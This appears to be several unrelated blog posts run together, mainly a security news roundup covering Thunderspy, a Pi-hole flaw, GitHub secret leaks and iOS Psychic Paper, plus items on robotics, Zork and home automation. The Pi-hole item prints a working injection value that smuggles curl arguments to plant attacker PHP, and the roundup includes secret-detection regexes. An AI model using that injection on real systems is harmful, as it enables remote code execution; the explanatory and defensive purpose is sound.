Based on a few details from the request for project proposals, it looks like the DoD is targeting mostly companies in this particular solicitation, but has left the door open for academic institutions as well. That makes intuitive sense. Companies can generally operate at a faster pace than most academic research labs. Given the urgency of the matter, faster turnarounds in technological development are imperative. Nonetheless, we have seen quite a bit of important COVID-19 work coming from academic research labs, and we imagine that battling this pandemic will take all the brilliant minds we can muster.
It’s good to see the DoD join the fight in what could be a lengthy battle with the coronavirus.
Augmented reality (AR) in the classroom has garnered a bit of interest over the years, but given the increased need for remote and virtual learning these days, it might be worth taking a closer look at what AR can offer. Purdue University’s C Design Lab thinks they’ve found a solution in their Meta-AR platform. The platform lets an instructor monitor each student’s work in real time without being in the same classroom as the student. Not only that, it lets students collaborate with one another in real time, trading tips and feedback and interacting with each other’s work, no matter where they may be physically located.
Thunderspy was announced this week by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into FireWire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, since the hardware DMA was entirely independent of software, it was even possible to debug a crashed kernel over FireWire.
Once the vulnerability was made public, hardware and software vendors took steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation: a user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
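If you’re curious what that looks like in practice, Linux exposes connected Thunderbolt devices through sysfs, UUIDs included. Here’s a minimal sketch (assuming a kernel with the thunderbolt driver loaded; the exact attributes available can vary by kernel version) that lists them:

```python
# Minimal sketch: list Thunderbolt devices and their UUIDs on a Linux machine
# by reading sysfs. Assumes the kernel's thunderbolt driver is loaded and uses
# the standard /sys/bus/thunderbolt layout; attribute availability can vary.
from pathlib import Path

SYSFS = Path("/sys/bus/thunderbolt/devices")

def read_attr(dev: Path, name: str) -> str:
    try:
        return (dev / name).read_text().strip()
    except OSError:
        return "?"

for dev in sorted(SYSFS.glob("*")):
    uuid = read_attr(dev, "unique_id")
    if uuid == "?":
        continue  # skip entries without a unique_id (e.g. domain objects)
    print(f"{dev.name}: {read_attr(dev, 'vendor_name')} {read_attr(dev, 'device_name')} "
          f"uuid={uuid} authorized={read_attr(dev, 'authorized')}")
```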
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or Thunderbolt device and read the firmware directly off the Thunderbolt controller. That firmware can be modified and re-uploaded, and one of the simplest attacks this enables is turning the security level down to its lowest setting.
It’s interesting research, and there are fixes in place or on the way to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: a laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other, potentially better, attack options. There is one narrow circumstance where Thunderspy is the perfect technique: a device with an encrypted drive that’s been powered on and logged into, but locked. In that case, Thunderspy could be used to recover the drive encryption key from memory and then to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component of their sign-on SDK, which caused many apps that use that SDK to crash. It’s worth asking whether it’s a good idea for so many popular apps to depend on Facebook code. There doesn’t appear to have been a vulnerability or path to compromise beyond the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack in a campaign targeting a variety of vulnerabilities. The general strategy is to inject malicious JavaScript that lies dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the very trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
GoDaddy Breach
GoDaddy users were recently informed of a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019 and wasn’t discovered for six months. GoDaddy has stated that there wasn’t any evidence of malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple: just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved into the web directory, and an HTTP request triggers that code.
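The root cause here is the age-old sin of splicing untrusted input into a shell command. The sketch below isn’t Pi-hole’s code (that’s PHP); it’s just a generic Python illustration of how the quotes in that blocklist value smuggle extra curl arguments in, and how handing curl an argument list instead sidesteps the problem:

```python
# Generic illustration (not Pi-hole's actual PHP): why splicing an untrusted
# URL into a shell command is dangerous, and the argument-list alternative.
import shlex
import subprocess

url = 'http://192.168.122.1#" -o fun.php -d "'   # attacker-chosen "blocklist" URL

# Vulnerable pattern: the URL is pasted into a shell string, so its embedded
# quotes break out and curl receives extra -o / -d arguments it was never
# meant to see.
cmd = f'curl -sS "{url}" -o /tmp/list.txt'
print(shlex.split(cmd))
# ['curl', '-sS', 'http://192.168.122.1#', '-o', 'fun.php', '-d', '', '-o', '/tmp/list.txt']

# Safer pattern: no shell, one argv entry per argument. The URL stays a single
# opaque string no matter what quotes or dashes it contains.
subprocess.run(["curl", "-sS", "-o", "/tmp/list.txt", "--", url], check=False)
```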
Leaking on GitHub
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties simply by searching GitHub for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things: vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password on the command line, thinking you were authenticating with SSH or sudo? It’s an easy mistake to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us: sanitize projects before pushing code to GitHub.
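A quick sanity pass before pushing costs almost nothing. Here’s a rough sketch of the idea; the file names and regexes are purely illustrative, and dedicated scanners like gitleaks or trufflehog go much further:

```python
# Rough pre-push sanity check: walk the working tree and flag files and
# patterns that commonly leak secrets. The names and regexes here are purely
# illustrative; dedicated scanners such as gitleaks or trufflehog go further.
import re
from pathlib import Path

RISKY_NAMES = {".bash_history", "vim_settings.xml", ".env", "id_rsa", ".npmrc"}
RISKY_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                          # AWS access key ID
    re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),  # private key blocks
    re.compile(r"(?i)(password|secret|api[_-]?key)\s*[:=]\s*\S+"),
]

for path in Path(".").rglob("*"):
    if ".git" in path.parts or not path.is_file():
        continue
    if path.name in RISKY_NAMES:
        print(f"[risky file] {path}")
        continue
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        continue
    for pattern in RISKY_PATTERNS:
        if pattern.search(text):
            print(f"[possible secret] {path}: matches {pattern.pattern}")
            break
```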
Personally, I am a fan of the real thing, but dogs aren’t an option for everyone. Plus, robotic dogs are easier to train and don’t pee on your couch. If you are looking to adopt a robotic companion, Stanford Pupper might be a good place to start. It’s a new open source project from the Stanford Robotics Student group, a group of robotics hackers from Stanford University. This robotic quadruped looks pretty simple to build, and it also looks like a great intro to four-legged robots.
This is the first version of the design, but it looks pretty complete, built around a carbon fiber and 3D-printed frame. The carbon fiber parts have to be cut out on a router, but you can order them pre-cut here, and you might be able to adapt the design to easier materials. The Pupper is driven by twelve servos, powered from a 5200 mAh 2S LiPo battery through a custom power-distribution PCB. That means it can run autonomously.
Though mostly known for its releases on countless 8-bit personal computers from the 1970s and 1980s, the game of Zork began its life on a PDP-10 mainframe. Recently, MIT released the original source code for this version of Zork. As we covered a while ago, the history of Zork is a long and illustrious one, a history that begins with this initial version, written in MDL.
To recap, MDL is a LISP-derived language that excels at natural language processing. It was developed and used at MIT’s AI and LCS (now CSAIL) labs for a number of projects, and, of course, to develop games with. The use of MDL gave Zork as a text-based adventure a level of interaction that was far ahead of its time.
What MIT has made available is the source code from Zork as it existed around 1977, at a time when it was being distributed to universities around the US. For purely educational purposes, obviously. This means that it’s a version of Zork before it was commercialized (~1979), showing a rare glimpse of the game as it was still busily being expanded.
Running the game will take a bit of effort, however. These files were retrieved from an original MIT backup tape that was used with their PDP-10 machines. Ideally one would use a 1970s-era PDP-10 mainframe with an MDL compiler, but in a pinch one could run a PDP-10 emulator as well.
Let us know whether you got it to run. Screenshots (ASCII or not) are highly encouraged.
Apple recently patched a security problem, fixing the Psychic Paper 0-day. This was a frankly slightly embarrassing flaw that [Siguza] discovered in how iOS processes XML data in an application’s code signature, and it gave him access to any entitlement on the iOS system, including running outside a sandbox.
Entitlements on iOS are a set of permissions that an application can request. These entitlements range from com.apple.private.security.no-container, which lets an app run outside its sandbox container, to platform-application, which tells the system that this is an official Apple application. As one would expect, Apple controls entitlements with a firm grip, and only allows certain entitlements on apps hosted on their official store. Even developer-signed apps are extremely limited, with only two entitlements allowed.
This system works via an XML property list that is part of the signed application. XML is a relative of HTML, but with a stricter set of rules. What [Siguza] discovered is that iOS contains four different XML parsers, and they deal with malformed XML slightly differently. The kicker is that one of those parsers does the security check, while a different parser is used for the actual permission implementation. Could this mismatch hide a vulnerability? Of course it could.
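To make the idea concrete, here’s a toy parser differential in Python. None of this is iOS code, and the comment handling is wildly simplified compared to the real bug; it just shows how two parsers that strip comments differently can disagree about whether a dangerous entitlement is present:

```python
# Toy parser differential (hypothetical, not Apple's code): the "checker"
# strips comments greedily and never sees the dangerous key, while the
# "consumer" strips them lazily and happily grants it.
import re

ENTITLEMENTS = """
<dict>
  <!-- a --><key>platform-application</key><true/><!-- b -->
</dict>
"""

def checker_view(blob: str) -> str:
    # Security-check parser: greedy comment stripping removes everything from
    # the first <!-- to the last -->, key included.
    return re.sub(r"<!--.*-->", "", blob, flags=re.DOTALL)

def consumer_view(blob: str) -> str:
    # Entitlement-granting parser: lazy stripping removes only the two real
    # comments, so the key survives.
    return re.sub(r"<!--.*?-->", "", blob, flags=re.DOTALL)

DANGEROUS = "platform-application"
print("checker sees the key: ", DANGEROUS in checker_view(ENTITLEMENTS))   # False
print("consumer sees the key:", DANGEROUS in consumer_view(ENTITLEMENTS))  # True
```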
Wink Labs just announced that their home automation hub, the Wink Hub, is “transitioning to a $4.99 monthly subscription, starting on May 13, 2020.” Should you fail to pay the fiver every month, you will lose access to their app, voice control, and automations, which is everything it does as far as we can tell.
This is an especially bitter pill to swallow for Hub users, because the device was just that: a hub. It speaks Bluetooth, Z-Wave, ZigBee, WiFi, Kidde, and a couple other specific device protocols, interfaces with Amazon’s Alexa, has a handy Android master panel app, and has a nice “robot” system that makes the automation side of “home automation” simple for normal people. In short, with its low one-time purchase price, compatibility with many devices, nice phone app, and multiple radios, it was a great centerpiece for a home-automation setup.
“Nice home automation system you’ve got there. Would be a shame if anything happened to it.”